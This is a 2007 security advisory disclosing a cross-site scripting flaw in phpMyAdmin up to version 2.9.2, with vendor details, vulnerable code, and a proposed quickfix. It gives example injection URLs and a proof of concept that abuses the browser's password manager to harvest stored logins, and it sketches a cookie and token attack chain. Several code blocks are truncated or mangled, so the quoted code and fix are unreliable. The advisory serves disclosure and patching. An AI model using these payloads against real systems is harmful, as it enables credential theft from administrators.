--------------------------------------------------------------------------------- | ____ ____.__ __ | | \ \ / /|__|_______/ |_ __ _______ ___ ___ | | \ Y / | \_ __ \ __\ | \__ \ \ \/ / | | \ / | || | \/| | | | // __ \_> < | | \___/ |__||__| |__| |____/(____ /__/\_ \ | | \/ \/ | | Security without illusions | | www.virtuax.be | | | --------------------------------------------------------------------------------- Application: Phpmyadmin Vulnerable Versions: <= v2.9.2 Vulnerability: XSS Vendor: http://www.phpmyadmin.net Vendor Status: notified Found: 23-01-2007 Public Release Date: 07-02-2007 Last modified: 01-03-2007 Author: AlFa reference: http://www.virtuax.be/advisories/Advisory2-24012007.txt ================================================================================= Special thanks to Ciri for coding that nice POC, testing and spell check =) Shouts to RedFern, dreamer--, Shadow, r4n01 and the rest of the Virtuax Community! ================================================================================= I. Background ------------- "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields, manage privileges,export data into various formats and is available in 50 languages." by phpmyadmin.net II. Vulnerablity ---------------- The xss attack vector can be inserted in $db or $table. But the catch is that the attack variable must be submitted together with $token otherwise it won't work. That makes it quiet useless for session stealing but in combination with XSRF and XSS it is possible to steal the username and password from an unsuspicious users when their credentials are stored in the browser password manager. The code listed below is taken from phpmyadmin 2.9.2 and may vary for older versions. [Code=index.php (116-132)] ... ... [/code] [code=./libraries/common.lib.php (1395-1412)] ... /** * escapes a string to be inserted as string a JavaScript block * enclosed by * this requires only to escape ' with \' and end of script block * * @uses strtr() * @param string $string the string to be escaped * @return string the escaped string */ function PMA_escapeJsString($string) { return strtr($string, array( '\\' => '\\\\', '\'' => '\\\'', "\n" => '\n', "\r" => '\r', ' ' (uppercase) tag. after that we can write javascript or if preferred html. eg: http://phpmyadmin.example.com/index.php?token=$token&db/table=';[XSS] http://phpmyadmin.example.com/index.php?token=$token&db/table=[HTML] IIa. Affected Versions ---------------------- all version >= 2.8.0 and < 2.10.x are tested and found vulnerably, presumably some older version are also vulnerable but they weren't tested. Tested with browsers: FF 2.0, FF 1.5, IE 6.0 and Opera 9.10 III. POC -------- The POC is pretty simple, just log in to phpmyadmin, copypaste the (modified) URL below and then you see the loginform with your credentials filled in (if you store store them in your browser). http://phpmyadmin.example.com/index.php?lang=en-utf-8&token=$token&db=';// ]]>
Log in
// 1000. [code=steel.php] [/code] To really exploit this vulnerability is a little more difficult because of the cookie authentication method used in phpmyadmin. But in case the domain where phpmyadmin is hosted contains XSS holes, it isn't that hard to achieve. One could connect to the phpmyadmin trough sockets to obtain login information like the token and cookie values and then set the right cookies at te target by using the xss hole (on the same domain where phpmyadmin is hosted) with javascript. Then you'll just have to load the poc url (in a frame) and that should do it. And thanx to Michael Zalewski an XSS isn't necessary anymore for FF <2.0.2 (http://lcamtuf.dione.cc/ffhostname.html). IV. Solution ------------ A. Quickfix Replace this code (./libraries/common.lib.php (1406-1411)): return strtr($string, array( '\\' => '\\\\', '\'' => '\\\'', "\n" => '\n', "\r" => '\r', ' ' '\\\\', '\'' => '\\\'', "\n" => '\n', "\r" => '\r', ' '